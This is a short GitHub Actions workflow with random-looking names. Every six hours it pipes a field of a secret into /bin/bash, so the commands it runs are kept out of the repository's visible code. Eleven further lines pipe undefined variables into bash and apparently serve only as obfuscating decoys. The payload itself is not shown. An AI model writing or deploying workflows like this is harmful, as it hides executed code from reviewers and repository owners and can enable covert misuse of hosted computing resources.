name: notionstaid

on:
  workflow_dispatch:
  schedule:
    - cron: '15 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: notionstaid
        env:
          bnnqy1164: ${{ secrets.bnnqy1164 }}
        run: |
          echo $bnnqy1164 | jq -r .e83 | /bin/bash
          echo $ve93794 | jq -r .s7 | /bin/bash
          echo $y8 | jq -r .tfdrd9 | /bin/bash
          echo $ccau92 | jq -r .whs96398 | /bin/bash
          echo $igy09 | jq -r .p21679 | /bin/bash
          echo $cdt35350 | jq -r .qbu663 | /bin/bash
          echo $nacuh5 | jq -r .r080 | /bin/bash
          echo $wra1 | jq -r .rlwn3489 | /bin/bash
          echo $auji752 | jq -r .n0 | /bin/bash
          echo $wufak3653 | jq -r .a93893 | /bin/bash
          echo $hys941 | jq -r .vr42369 | /bin/bash
          echo $h981 | jq -r .tyibp976 | /bin/bash

